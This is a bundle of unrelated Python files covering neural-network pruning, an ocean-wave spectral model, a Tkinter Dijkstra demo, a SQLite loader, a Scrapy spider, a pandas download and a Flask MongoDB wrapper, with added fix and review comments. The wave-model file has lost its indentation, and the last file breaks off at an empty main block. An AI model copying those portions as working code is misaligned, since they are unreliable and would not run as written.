    def __init__(self, model: NNCFNetwork, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
        self.model = model
        self.graph = graph
        self.nx_graph = nx_graph

    @staticmethod
    def get_class_by_type_name(type_name) -> PTDefaultMetaOp:
        """
        Return class of metaop that corresponds to type_name type.
        """
        metaop_cls = PT_PRUNING_OPERATOR_METATYPES.get_operator_metatype_by_op_name(type_name)
        if metaop_cls is None:
            nncf_logger.warning(
                "Layer {} is not pruneable - will not propagate pruned filters through it".format(type_name))
            metaop_cls = PTStopMaskForwardOps
        return metaop_cls

    def _sorted_nx_nodes(self):
        # Topological order guarantees every producer is visited before its consumers.
        return [self.nx_graph.nodes[name] for name in nx.topological_sort(self.nx_graph)]

    def mask_propagation(self):
        """
        Mask propagation in graph:
        to propagate masks run method mask_propagation (of metaop of current node) on all nodes in topological order.
        """
        for nx_node in self._sorted_nx_nodes():
            metaop = self.get_class_by_type_name(self.graph.node_type_fn(nx_node))
            metaop.mask_propagation(self.model, nx_node, self.graph, self.nx_graph)
        nncf_logger.info('Finished mask propagation in graph')

    def apply_mask(self):
        """
        Applying propagated masks for all nodes in topological order:
        1. running input_prune method for this node
        2. running output_prune method for this node
        """
        already_pruned = list()
        with torch.no_grad():
            for nx_node in self._sorted_nx_nodes():
                metaop = self.get_class_by_type_name(self.graph.node_type_fn(nx_node))
                nncf_node = self.graph._nx_node_to_nncf_node(nx_node)
                node_module = self.model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
                # Some modules can be associated with several nodes
                if node_module not in already_pruned:
                    metaop.input_prune(self.model, nx_node, self.graph, self.nx_graph)
                    metaop.output_prune(self.model, nx_node, self.graph, self.nx_graph)
                    already_pruned.append(node_module)
        nncf_logger.info('Finished mask applying step')

    def prune_model(self):
        """
        Model pruner work in two stages:
        1. Mask propagation: propagate pruning masks through the graph.
        2. Applying calculated masks
        :return:
        """
        nncf_logger.info('Start pruning model')
        self.mask_propagation()
        self.apply_mask()
        nncf_logger.info('Finished pruning model')
|
import numpy as np
import matplotlib.pyplot as plt
import time
import h5py
from ..doublyPeriodic import doublyPeriodicModel
from numpy import pi
class model(doublyPeriodicModel):
# Single-vertical-mode hydrostatic Boussinesq model linearized around 2-D
# turbulence; four prognostic variables (q, u, v, p).
def __init__(self, name = None,
# Grid parameters
nx = 128, ny = None, Lx = 2.0*pi, Ly = None,
# Solver parameters
t = 0.0,
dt = 1.0e-2, # Numerical timestep
step = 0,
timeStepper = 'RK4', # Time-stepping method
nThreads = 1, # Number of threads for FFTW
useFilter = False,
#
# Linearized Boussinesq params
f0 = 1.0,
kappa = 4.0,
# Friction
waveVisc = 0.0,
waveViscOrder = 2.0,
waveDiff = 0.0,
waveDiffOrder = 2.0,
meanVisc = 1.0e-4,
meanViscOrder = 2.0,
):
# Physical parameters specific to the Physical Problem
# f0: Coriolis parameter; kappa: vertical-mode eigenvalue sqrt;
# *Visc/*Diff + orders define (hyper)dissipation for mean flow and waves.
self.f0 = f0
self.kappa = kappa
self.meanVisc = meanVisc
self.meanViscOrder = meanViscOrder
self.waveVisc = waveVisc
self.waveViscOrder = waveViscOrder
self.waveDiff = waveDiff
self.waveDiffOrder = waveDiffOrder
# Initialize super-class.
doublyPeriodicModel.__init__(self, name = name,
physics = "single-mode hydrostatic Boussinesq equations" + \
" linearized around two-dimensional turbulence",
nVars = 4,
realVars = True,
# Persistant doublyPeriodic initialization arguments
nx = nx, ny = ny, Lx = Lx, Ly = Ly, t = t, dt = dt, step = step,
timeStepper = timeStepper, nThreads = nThreads, useFilter = useFilter,
)
# Default vorticity initial condition: Gaussian vortex
(xc, yc, R) = (self.x-self.Lx/2.0, self.y-self.Ly/2.0, self.Lx/20.0)
q0 = 0.1*self.f0 * np.exp( -(xc**2.0+yc**2.0)/(2*R**2.0) )
# Default wave initial condition: uniform velocity.
# NOTE(review): make_plane_wave(16) actually sets a plane wave, not a uniform
# velocity — comment above kept from the original; confirm which is intended.
u, v, p = self.make_plane_wave(16)
self.set_uvp(u, v, p)
self.set_q(q0)
self.update_state_variables()
# Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def describe_physics(self):
print("""
This model solves the Boussinesq equations linearized around \n
a two-dimensional barotropic flow for a single vertical mode. \n
No viscosity or dissipation can be specified, since this is not \n
required to stabilize the wave-field solutions. Arbitrary-order \n
hyperdissipation can be specified for the two-dimensional flow. \n
There are four prognostic variables: the two-dimensional flow,
the two horizontal velocity components u and v, and the pressure
field. The chosen vertical mode is represented by the single \n
parameter kappa, which is the square root of the eigenvalue \n
from the vertical mode eigenproblem.
""")
def _init_linear_coeff(self):
""" Calculate the coefficient that multiplies the linear left hand
side of the equation """
# Two-dimensional turbulent viscosity.
self.linearCoeff[:, :, 0] = -self.meanVisc \
* (self.k**2.0 + self.l**2.0)**(self.meanViscOrder/2.0)
self.linearCoeff[:, :, 1] = -self.waveVisc \
* (self.k**2.0 + self.l**2.0)**(self.waveViscOrder/2.0)
self.linearCoeff[:, :, 2] = -self.waveVisc \
* (self.k**2.0 + self.l**2.0)**(self.waveViscOrder/2.0)
self.linearCoeff[:, :, 3] = -self.waveDiff \
* (self.k**2.0 + self.l**2.0)**(self.waveDiffOrder/2.0)
def _calc_right_hand_side(self, soln, t):
""" Calculate the nonlinear right hand side of PDE """
# Views for clarity:
qh = soln[:, :, 0]
uh = soln[:, :, 1]
vh = soln[:, :, 2]
ph = soln[:, :, 3]
# Physical-space things
self.q = self.ifft2(qh)
self.u = self.ifft2(uh)
self.v = self.ifft2(vh)
self.p = self.ifft2(ph)
# Calculate streamfunction
self.psih = -qh / self._divSafeKsq
# Mean velocities
self.U = -self.ifft2(self._jl*self.psih)
self.V = self.ifft2(self._jk*self.psih)
# Mean derivatives
self.Ux = self.ifft2(self.l*self.k*self.psih)
self.Uy = self.ifft2(self.l**2.0*self.psih)
self.Vx = -self.ifft2(self.k**2.0*self.psih)
# Views to clarify calculation of A's RHS
U = self.U
V = self.V
q = self.q
u = self.u
v = self.v
p = self.p
Ux = self.Ux
Uy = self.Uy
Vx = self.Vx
# Solely nonlinear advection for q
self.RHS[:, :, 0] = - self._jk*self.fft2(U*q) - self._jl*self.fft2(V*q)
# Linear terms + advection for u, v, p, + refraction for u, v
self.RHS[:, :, 1] = self.f0*vh - self._jk*ph \
- self._jk*self.fft2(U*u) - self._jl*self.fft2(V*u) \
- self.fft2(u*Ux) - self.fft2(v*Uy)
self.RHS[:, :, 2] = -self.f0*uh - self._jl*ph \
- self._jk*self.fft2(U*v) - self._jl*self.fft2(V*v) \
- self.fft2(u*Vx) + self.fft2(v*Ux)
self.RHS[:, :, 3] = -self.cn**2.0 * ( self._jk*uh + self._jl*vh ) \
- self._jk*self.fft2(U*p) - self._jl*self.fft2(V*p)
self._dealias_RHS()
def _init_problem_parameters(self):
""" Pre-allocate parameters in memory in addition to the solution """
# Wavenumbers and products
self._jk = 1j*self.k
self._jl = 1j*self.l
self._divSafeKsq = self.k**2.0 + self.l**2.0
self._divSafeKsq[0, 0] = float('Inf')
# Mode-n wave speed:
self.cn = self.f0 / self.kappa
# Vorticity and wave-field amplitude
self.q = np.zeros(self.physVarShape, np.dtype('float64'))
self.u = np.zeros(self.physVarShape, np.dtype('float64'))
self.v = np.zeros(self.physVarShape, np.dtype('float64'))
self.p = np.zeros(self.physVarShape, np.dtype('float64'))
# Streamfunction transform
self.psih = np.zeros(self.specVarShape, np.dtype('complex128'))
# Mean and wave velocity components
self.U = np.zeros(self.physVarShape, np.dtype('float64'))
self.V = np.zeros(self.physVarShape, np.dtype('float64'))
self.Ux = np.zeros(self.physVarShape, np.dtype('float64'))
self.Uy = np.zeros(self.physVarShape, np.dtype('float64'))
self.Vx = np.zeros(self.physVarShape, np.dtype('float64'))
def update_state_variables(self):
""" Update diagnostic variables to current model state """
# Views for clarity:
qh = self.soln[:, :, 0]
uh = self.soln[:, :, 1]
vh = self.soln[:, :, 2]
ph = self.soln[:, :, 3]
# Streamfunction
self.psih = - qh / self._divSafeKsq
# Physical-space PV and velocity components
self.q = self.ifft2(qh)
self.u = self.ifft2(uh)
self.v = self.ifft2(vh)
self.p = self.ifft2(ph)
self.U = -self.ifft2(self._jl*self.psih)
self.V = self.ifft2(self._jk*self.psih)
def set_q(self, q):
""" Set model vorticity """
self.soln[:, :, 0] = self.fft2(q)
self._dealias_soln()
self.update_state_variables()
def make_plane_wave(self, kNonDim):
""" Set linearized Boussinesq to a plane wave in x with speed 1 m/s
and normalized wavenumber kNonDim """
# Dimensional wavenumber and dispersion-relation frequency
kDim = 2.0*pi/self.Lx * kNonDim
sigma = self.f0*np.sqrt(1 + kDim/self.kappa)
# Wave field amplitude.
#alpha = sigma**2.0 / self.f0**2.0 - 1.0
a = 1.0
# A hydrostatic plane wave. s > sqrt(s^2+f^2)/sqrt(2) when s>f
p = a * (sigma**2.0-self.f0**2.0) * np.cos(kDim*self.x)
u = a * kDim*sigma * np.cos(kDim*self.x)
v = a * kDim*self.f0 * np.sin(kDim*self.x)
return u, v, p
def set_uvp(self, u, v, p):
""" Set linearized Boussinesq variables """
self.soln[:, :, 1] = self.fft2(u)
self.soln[:, :, 2] = self.fft2(v)
self.soln[:, :, 3] = self.fft2(p)
self._dealias_soln()
self.update_state_variables()
def visualize_model_state(self, show=False):
""" Visualize the model state """
self.update_state_variables()
# Plot in kilometers
h = 1e-3
(qMax, c) = (np.max(np.abs(self.q)), 0.8)
(cmin, cmax) = (-c*qMax, c*qMax)
fig, axArr = plt.subplots(ncols=2, figsize=(8, 4), sharex=True, sharey=True)
fig.canvas.set_window_title("Waves and flow")
axArr[0].pcolormesh(h*self.x, h*self.y, self.q, cmap='RdBu_r',
vmin=cmin, vmax=cmax)
axArr[1].pcolormesh(h*self.x, h*self.y,
np.sqrt(self.u**2.0+self.v**2.0))
axArr[0].set_ylabel('$y$', labelpad=12.0)
axArr[0].set_xlabel('$x$', labelpad=5.0)
axArr[1].set_xlabel('$x$', labelpad=5.0)
message = '$t = {:.2e}$'.format(self.t)
titles = ['$q$ ($\mathrm{s^{-1}}$)', '$\sqrt{u^2+v^2}$ (m/s)']
#positions = [axArr[0].get_position(), axArr[1].get_position()]
plt.text(0.00, 1.03, message, transform=axArr[0].transAxes)
plt.text(1.00, 1.03, titles[0], transform=axArr[0].transAxes,
HorizontalAlignment='right')
plt.text(1.00, 1.03, titles[1], transform=axArr[1].transAxes,
HorizontalAlignment='right')
if show:
plt.pause(0.01)
else:
plt.savefig('{}/{}_{:09d}'.format(
self.plotDirectory, self.runName, self.step))
plt.close(fig)
def describe_model(self):
""" Describe the current model state """
print("\nThis is a doubly-periodic spectral model for \n" + \
"{:s} \n".format(self.physics) + \
"with the following attributes:\n\n" + \
" Domain : {:.2e} X {:.2e} m\n".format(self.Lx, self.Ly) + \
" Resolution : {:d} X {:d}\n".format(self.nx, self.ny) + \
" Timestep : {:.2e} s\n".format(self.dt) + \
" Current time : {:.2e} s\n\n".format(self.t) + \
"The FFT scheme uses {:d} thread(s).\n".format(self.nThreads))
# External helper functions - - - - - - - - - - - - - - - - - - - - - - - - - -
def init_from_turb_endpoint(fileName, runName, **additionalParams):
    """ Initialize a hydrostatic wave eqn model from the saved endpoint of a
        twoDimTurbulence run.

    Parameters:
        fileName: path to the HDF5 archive produced by twoDimTurbulence.
        runName: name of the run group inside the archive.
        additionalParams: keyword overrides applied on top of the stored
            model parameters.
    Returns: a new `model` whose vorticity field is the saved endpoint.
    Raises: ValueError if the run has no saved endpoint.
    """
    dataFile = h5py.File(fileName, 'r', libver='latest')
    if 'endpoint' not in dataFile[runName]:
        raise ValueError("The run named {} in {}".format(runName, fileName)
            + " does not have a saved endpoint.")
    # Get model input and re-initialize.
    # Fix: dict.iteritems() is Python 2 only; the rest of this file is
    # Python 3, so use items() on the h5py attrs mapping.
    inputParams = { param: value
        for param, value in dataFile[runName].attrs.items() }
    # Change 'visc' to 'meanVisc'
    inputParams['meanVisc'] = inputParams.pop('visc')
    inputParams['meanViscOrder'] = inputParams.pop('viscOrder')
    # Change default time-stepper
    inputParams['timeStepper'] = 'RK4'
    # Re-initialize model with input params, if any are given
    inputParams.update(additionalParams)
    m = model(**inputParams)
    # Initialize turbulence field
    m.set_q(dataFile[runName]['endpoint']['q'][:])
    return m
|
from tkinter import *
from math import ceil
import time
import math
import timeit
class App:
    """Top-level application object: attaches the pathfinding grid UI
    to the given Tk *master* window."""

    def __init__(self, master):
        self.master = master
        # The grid builds and places all of its own widgets; we only need
        # to construct it (the local name is not used afterwards).
        main_grid = mainGrid(self.master, 0, 0)
class mainGrid:
    """Tkinter grid UI for interactive Dijkstra pathfinding.

    Left-click toggles walls (red), right-click toggles targets (green).
    "Start" (grid panel) builds the grid; "Start" (algorithm) runs Dijkstra
    from the coordinates entered in the X/Y boxes.

    Each cell's metadata list (self.gridType[row][col]) holds:
      [0] type (0 normal, 1 wall, 2 target), [1] unique node index,
      [2] previous node (as (x, y) or -1 for the start), [3] distance,
      [4] x (column), [5] y (row), [6] visited flag.
    """
    def __init__(self, parent, x, y):
        self.parent = parent
        self.container = Frame(self.parent)
        self.container.grid(row=x, column=y)
        self.canvasWidth = 500
        self.canvasHeight = 500
        self.mainCanvas = Canvas(self.container, bg="black", width = self.canvasWidth, height = self.canvasHeight)
        self.mainCanvas.grid(row=0, column=0)
        self.buttonCanvas = Canvas(self.container, bg="white", width = 200, height = self.canvasHeight)
        self.buttonCanvas.grid(row=0, column= 1)
        self.mainCanvas.bind('<Button-1>', self.click)
        self.mainCanvas.bind('<Button-3>', self.rightClick)
        self.mainCanvas.bind('<space>', self.start)
        self.createMenu()
        self.mainCanvas.focus_set()
        # NOTE(review): the grid itself is only built when the user presses
        # the grid "Start" button; clicking the canvas before that raises
        # AttributeError (no self.grid / self.boxSizeX). Confirm intent.

    def setGridSize(self):
        """Read the width/height entries and (re)build the grid."""
        self.gridHeightX = self.gridSizeX.get()
        # Fix: the height was read from the X entry, so the HEIGHT box
        # was silently ignored and grids were always square.
        self.gridHeightY = self.gridSizeY.get()
        self.createGrid()

    def refreshGrid(self):
        """Rebuild the grid with the current dimensions (clears all state)."""
        self.createGrid()

    def createGrid(self):
        """Create the x-by-y grid of rectangles and per-cell metadata."""
        x = self.gridHeightX
        y = self.gridHeightY
        x = int(x)
        y = int(y)
        self.grid = []
        self.gridType = []
        self.boxSizeX = (self.canvasWidth/x)
        self.boxSizeY = (self.canvasHeight/y)
        for i in range(y):
            self.grid.append([])
            self.gridType.append([])
            for j in range(x):
                self.grid[i].append(self.mainCanvas.create_rectangle(0, 0, 50, 50, fill="white"))
                # Fix: the unique node index must stride by the row width x
                # ((y*i)+j collides on non-square grids, breaking the
                # duplicate check in findAdjacent).
                self.gridType[i].append([0, (x * i) + j, 0, 1000000, j, i, 0])
                self.mainCanvas.coords(self.grid[i][j], j*self.boxSizeX, i*self.boxSizeY, j*self.boxSizeX + self.boxSizeX, i*self.boxSizeY + self.boxSizeY)

    def createMenu(self):
        """Build the side-panel buttons, entries and labels."""
        self.startAlgoBtn = Button(self.buttonCanvas, text="Start", command=self.start)
        self.startAlgoBtn.place(x = 20, y = 200)
        self.startEntryX = Entry(self.buttonCanvas)
        self.startEntryX.config(width=4, font="Serif 10 bold")
        self.startEntryX.insert(0, "10")
        self.startEntryX.place(x=30, y=150)
        self.startEntryY = Entry(self.buttonCanvas)
        self.startEntryY.config(width=4, font="Serif 10 bold")
        self.startEntryY.insert(0, "10")
        self.startEntryY.place(x=30, y=170)
        self.buttonCanvas.create_text(20, 160, fill="black", font="Arial 10 bold", text="X:")
        self.buttonCanvas.create_text(20, 180, fill="black", font="Arial 10 bold", text="Y:")
        self.createGridBtn = Button(self.buttonCanvas, text="Start", command=self.setGridSize)
        self.refreshGridBtn = Button(self.buttonCanvas, text="Reset", command=self.refreshGrid)
        self.createGridBtn.place(x = 20, y = 100)
        self.refreshGridBtn.place(x = 20, y = 125)
        self.gridSizeX = Entry(self.buttonCanvas)
        self.gridSizeX.config(width=4, font="Serif 10 bold")
        self.gridSizeX.insert(0, "10")
        self.gridSizeX.place(x=70, y=50)
        self.gridSizeY = Entry(self.buttonCanvas)
        self.gridSizeY.config(width=4, font="Serif 10 bold")
        self.gridSizeY.insert(0, "10")
        self.gridSizeY.place(x=70, y=70)
        self.buttonCanvas.create_text(40, 60, fill="black", font="Arial 10 bold", text="WIDTH:")
        self.buttonCanvas.create_text(40, 80, fill="black", font="Arial 10 bold", text="HEIGHT:")
        self.cornersEnabledButton = IntVar()
        self.cornersCheckBox = Checkbutton(self.buttonCanvas, text='Diagonals Enabled', variable = self.cornersEnabledButton)
        self.cornersCheckBox.place(x=20, y=225)

    def click(self, event):
        """Left-click handler: toggle a wall cell."""
        x, y = event.x, event.y
        self.updateGridClick(x, y)

    def rightClick(self, event):
        """Right-click handler: toggle a target cell."""
        x, y = event.x, event.y
        self.updateGridRightclick(x, y)

    def updateGridClick(self, x, y):
        """Toggle the clicked cell between normal (white) and wall (red)."""
        gridX = (ceil(x/self.boxSizeX)) - 1
        gridY = (ceil(y/self.boxSizeY)) - 1
        if self.gridType[gridY][gridX][0] == 0:
            self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="red")
            self.gridType[gridY][gridX][0] = 1
        elif self.gridType[gridY][gridX][0] == 1:
            self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="white")
            self.gridType[gridY][gridX][0] = 0
        print(gridX, gridY)

    def start(self, event=None):
        """Run Dijkstra from the coordinates in the start entries.

        Fix: accepts an optional *event* because this method is bound to the
        <space> key (which passes an event) as well as a Button command
        (which passes nothing); previously the key binding raised TypeError.
        """
        print("Hi")
        x = self.startEntryX.get()
        y = self.startEntryY.get()
        x = int(x)
        y = int(y)
        self.cornersEnabled = self.cornersEnabledButton.get()
        self.SetupDjykstras(x, y)

    def updateGridRightclick(self, x, y):
        """Toggle the clicked cell between normal (white) and target (green)."""
        gridX = (ceil(x/self.boxSizeX)) - 1
        gridY = (ceil(y/self.boxSizeY)) - 1
        if self.gridType[gridY][gridX][0] == 0:
            self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="green")
            self.gridType[gridY][gridX][0] = 2
        elif self.gridType[gridY][gridX][0] == 2:
            self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="white")
            self.gridType[gridY][gridX][0] = 0
        print(gridX, gridY)

    def SetupDjykstras(self, startX, startY):
        """Initialize the start node and kick off the Dijkstra loop."""
        #0 is type (0 for normal, 1 for wall, 2 for target)
        #1 is for node index
        #2 is for previous node
        #3 is for distance
        #4 is x
        #5 is y
        #6 is unvisited
        # Fix: the grid is indexed [row][col] i.e. [y][x] everywhere else;
        # the original mixed [startX][startY] and [startY][startX], so the
        # start distance/previous were written to the wrong cell when
        # startX != startY.
        self.mainCanvas.itemconfigure(self.grid[startY][startX], fill="blue")
        self.gridType[startY][startX][2] = -1
        self.gridType[startY][startX][3] = 0
        startNode = self.gridType[startY][startX]
        currentNode = self.gridType[startY][startX]
        currentNodes = [currentNode]
        self.complete = False
        self.LoopDijkstra(self.gridType, currentNodes, startNode)

    def LoopDijkstra(self, allNodes, activeNodes, startNode):
        """Main Dijkstra loop: repeatedly visit the cheapest frontier node."""
        print(activeNodes)
        while self.complete == False:
            if len(activeNodes) == 0:
                self.complete = "None Found"
                print("Path not found")
                break
            # Cheapest node first (ties broken by x, then y).
            activeNodes = sorted(activeNodes, key=lambda x: (x[3], x[4], x[5]), reverse=False)
            targetNode = activeNodes[0]
            allNodes[targetNode[5]][targetNode[4]][6] = 1
            self.mainCanvas.itemconfigure(self.grid[targetNode[5]][targetNode[4]], fill="orange")
            activeNodes.pop(0)
            print("activeNodes")
            print(activeNodes)
            self.mainCanvas.update_idletasks()
            activeNodes, allNodes = self.findAdjacent(targetNode, activeNodes, allNodes)
        if self.complete == True:
            print("Drawing")
            self.drawPath(allNodes, self.finalNode, startNode)
        self.mainCanvas.update_idletasks()

    def findAdjacent(self, targetNode, activeNodes, allNodes):
        """Relax the (up to 8) neighbours of *targetNode*.

        The >= 0 guard prevents Python's negative indexing from wrapping
        around the grid; out-of-range positive indices are absorbed by the
        IndexError handler.
        """
        print("Target Node:")
        print(targetNode)
        adjacent = [[-1, -1], [0, -1], [1, -1],
                    [-1, 0], [1, 0],
                    [-1, 1], [0, 1], [1, 1]]
        corners = [0, 2, 5, 7]
        targetNodeX = targetNode[4]
        targetNodeY = targetNode[5]
        targetDistance = targetNode[3]
        unvisitedNodes = []
        for i in range(0, 8):
            try:
                if ((targetNodeX + adjacent[i][0]) >= 0) and ((targetNodeY + adjacent[i][1]) >= 0):
                    print("passed out of bounds")
                    print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
                    if (allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][0]) != 1:
                        print("passed out of type check")
                        print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
                        if (allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][6]) == 0:
                            print("passed already contains check")
                            print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
                            if i in corners:
                                if self.cornersEnabled:
                                    # Diagonal step costs sqrt(2).
                                    if allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] > (targetDistance + math.sqrt(2)):
                                        allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] = (targetDistance + math.sqrt(2))
                                        allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][2] = (targetNode[4], targetNode[5])
                                else:
                                    continue
                            else:
                                # Orthogonal step costs 1.
                                if allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] > (targetDistance + 1):
                                    allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] = (targetDistance + 1)
                                    allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][2] = (targetNode[4], targetNode[5])
                            contains = False
                            if (allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][0]) == 2:
                                self.complete = True
                                print("Complete")
                                self.finalNode = allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]]
                                break
                            for j, jValue in enumerate(activeNodes):
                                if jValue[1] == allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][1]:
                                    contains = True
                            if contains == False:
                                print("appending")
                                print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
                                activeNodes.append(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
                                self.mainCanvas.itemconfigure(self.grid[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]], fill="yellow")
            except IndexError:
                pass
        self.mainCanvas.update_idletasks()
        print("Returned active Nodes:")
        print(activeNodes)
        return activeNodes, allNodes

    def drawPath(self, currentNodes, finalNode, startNode):
        """Trace previous-node links back from the target and draw the path.

        The loop terminates via the break when it reaches the start node,
        whose previous-node field is -1 (completed is never set True).
        """
        lastNode = finalNode
        completed = False
        while completed != True:
            if lastNode[2] == -1:
                break
            currentNode = currentNodes[lastNode[2][1]][lastNode[2][0]]
            print(lastNode)
            self.mainCanvas.create_line(currentNode[4] *self.boxSizeX +(self.boxSizeX/2), currentNode[5]*self.boxSizeY +(self.boxSizeY/2), lastNode[4]*self.boxSizeX + (self.boxSizeX/2), lastNode[5]*self.boxSizeY + (self.boxSizeY/2))
            lastNode = currentNode
# Build the Tk root window, attach the pathfinding app, and enter the
# Tk event loop (blocks until the window is closed).
root = Tk()
app = App(root)
root.title('Pathfinding')
root.mainloop()
|
import os
import csv
import glob
from pathlib import Path
import sqlite3
from collections import defaultdict
def main():
    """Load population.csv, linearly interpolate the inter-census years,
    and store the result in the king-county-assessor SQLite database.

    The CSV must contain rows for every decade year 1900..2000 with
    columns 'year', 'king_county' and 'seattle'.
    """
    PROJECT_ROOT = Path(__file__).parent.parent
    DATABASE = str(Path(Path.home(), 'king-county-assessor.sqlite3'))
    # NOTE(review): `with sqlite3.connect(...)` commits/rolls back but does
    # NOT close the connection — acceptable for a one-shot script.
    with sqlite3.connect(DATABASE) as connection:
        connection.execute('DROP TABLE IF EXISTS population;')
        # Renamed from 'create_parcels_footage' — this creates the
        # population table, not parcel footage.
        create_population = '''
            CREATE TABLE population (
                year INTEGER,
                king_county INTEGER,
                seattle INTEGER
            );
        '''
        connection.execute(create_population)
        file_path = os.path.join(str(PROJECT_ROOT), 'data', 'population.csv')
        with open(file_path) as f:
            rows = csv.DictReader(f)
            print('loading csv: ' + file_path + '\n')
            raw_data = {
                int(row['year']): row
                for row in rows
            }
        interpolated_data = defaultdict(dict)
        interpolated_data.update(raw_data)
        for area in 'seattle', 'king_county':
            for base_year in range(1900, 2000, 10):
                print('interpolating {}'.format(base_year))
                next_year = base_year + 10
                base_pop = int(raw_data[base_year][area])
                # Linear step between the two bracketing census counts.
                step = (int(raw_data[next_year][area]) - base_pop) / 10
                for year in range(base_year + 1, next_year):
                    base_pop += step
                    interpolated_data[year]['year'] = year
                    interpolated_data[year][area] = base_pop
        connection.executemany(
            '''
            INSERT INTO population
            (year, seattle, king_county)
            VALUES
            (:year,:seattle,:king_county)
            ''',
            interpolated_data.values()
        )


# Fix: main() was defined but never invoked, so running this script did
# nothing. Guarded so importing the module stays side-effect free.
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
import re
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from hotline.items import HotlineItem
class DongguanSpider(CrawlSpider):
    """Crawl the Dongguan sunshine-hotline complaint board (wz.sun0769.com):
    follow pagination links and parse each complaint detail page."""
    name = 'Dongguan'
    allowed_domains = ['wz.sun0769.com']
    start_urls = ['http://wz.sun0769.com/index.php/question/questionType?type=4&page=30']
    rules = (
        # Detail pages yield items and are followed for further links.
        Rule(LinkExtractor(allow=r'question/\d+/\d+\.shtml'), callback='parse_item', follow=True),
        # Pagination links are only followed (no callback).
        Rule(LinkExtractor(allow=r'type=\d+&page=\d+')),
    )

    def parse_item(self, response):
        """Extract url, title, complaint number and body text from one
        complaint detail page and yield a HotlineItem."""
        url = response.url
        title_number = response.xpath('//div[@class="pagecenter p3"]//strong[@class="tgray14"]/text()').extract_first()
        # The header text looks like: "提问:<title> 编号:195555"
        # (a full-width-colon "question:" prefix, the title, then a
        # full-width-colon "number:" suffix).
        print(title_number)
        title_number = title_number.split(":")[1]
        title = title_number.split('\xa0\xa0')[0]
        # NOTE(review): this second split on the full-width colon is applied
        # to the ALREADY-split text, so it only yields the number if the
        # remainder still contains a colon — verify against a live page.
        number = title_number.split(":")[1]
        content = response.xpath("//div[@class='c1 text14_2']//text()").get()
        yield HotlineItem(url=url, title=title, number=number, content=content)
|
import pandas as pd

# Download the MovieLens user table used by the DAT8 course.
url = "https://raw.githubusercontent.com/justmarkham/DAT8/master/data/u.user"
# Fix: u.user is pipe-separated, not tab-separated — sep="\t" loaded the
# whole row into a single column.
occupation = pd.read_csv(url, sep="|")
# Fix: forward slash so the relative path works on every platform (the
# original "Datasets\occupation.csv" only worked on Windows, and relied on
# "\o" not being an escape sequence).
occupation.to_csv("Datasets/occupation.csv")
# Third party import
import pymongo
# Local application imports
from flask import (
_app_ctx_stack,
current_app
)
class MongoConnector(object):
    """Pymongo.MongoClient wrapper.

    Wraps the default MongoClient for proper database handling inside a
    Flask app context: the client is created lazily per app context and
    closed when the context is torn down.
    """
    def __init__(self, app=None):
        self.app = app
        if app is not None:
            self.init_app(app)

    def init_app(self, app):
        """Register the teardown hook on the Flask app."""
        app.teardown_appcontext(self.teardown)

    def connect(self):
        """Create a MongoClient from the current app's DB_* config.

        Uses authenticated access when DB_USERNAME is configured,
        anonymous access otherwise.
        """
        db_host = current_app.config.get('DB_HOST', None)
        db_port = current_app.config.get('DB_PORT', None)
        # Fix: int(None) raised TypeError when DB_PORT was not configured;
        # leave it as None so pymongo falls back to its default port.
        db_port = int(db_port) if db_port is not None else None
        db_username = current_app.config.get('DB_USERNAME', None)
        if db_username is not None:
            db_password = current_app.config.get('DB_PASSWORD', None)
            db_auth_src = current_app.config.get('DB_NAME', None)
            mongo_client = pymongo.MongoClient(host=db_host,
                                               port=db_port,
                                               username=db_username,
                                               password=db_password,
                                               authSource=db_auth_src)
        else:
            mongo_client = pymongo.MongoClient(host=db_host,
                                               port=db_port)
        return mongo_client

    def teardown(self, exception):
        """App-context teardown hook: close the per-context client."""
        ctx = _app_ctx_stack.top
        if hasattr(ctx, 'mongo_db'):
            ctx.mongo_db.close()

    @property
    def connection(self):
        """Lazily-created MongoClient cached on the current app context."""
        ctx = _app_ctx_stack.top
        if ctx is not None:
            if not hasattr(ctx, 'mongo_db'):
                ctx.mongo_db = self.connect()
            return ctx.mongo_db

    @property
    def get_db(self):
        """The configured database (DB_NAME) from the cached client."""
        return self.connection[current_app.config.get('DB_NAME', None)]
|
#!/usr/bin/env python
# encoding: utf-8
import sys
def to_network(filename, outputname):
    """Rewrite *filename* into *outputname*, replacing mapped characters.

    The input file starts with a header of "char:digit" lines terminated by
    a single blank line; every character of the remaining text that appears
    in the header is replaced by its digit, everything else is copied
    verbatim.

    Fix: the original leaked both file handles (never closed) and built the
    output with quadratic string concatenation.
    """
    convert = {}
    with open(filename, "r") as src, open(outputname, "w") as dst:
        line = src.readline()
        while (line != '\n'):
            key, digits = line.split(":")
            convert[key] = int(digits)
            line = src.readline()
        text = src.read()
        # join() instead of repeated += : linear instead of quadratic.
        dst.write("".join(
            str(convert[char]) if char in convert else char
            for char in text
        ))
if __name__ == "__main__":
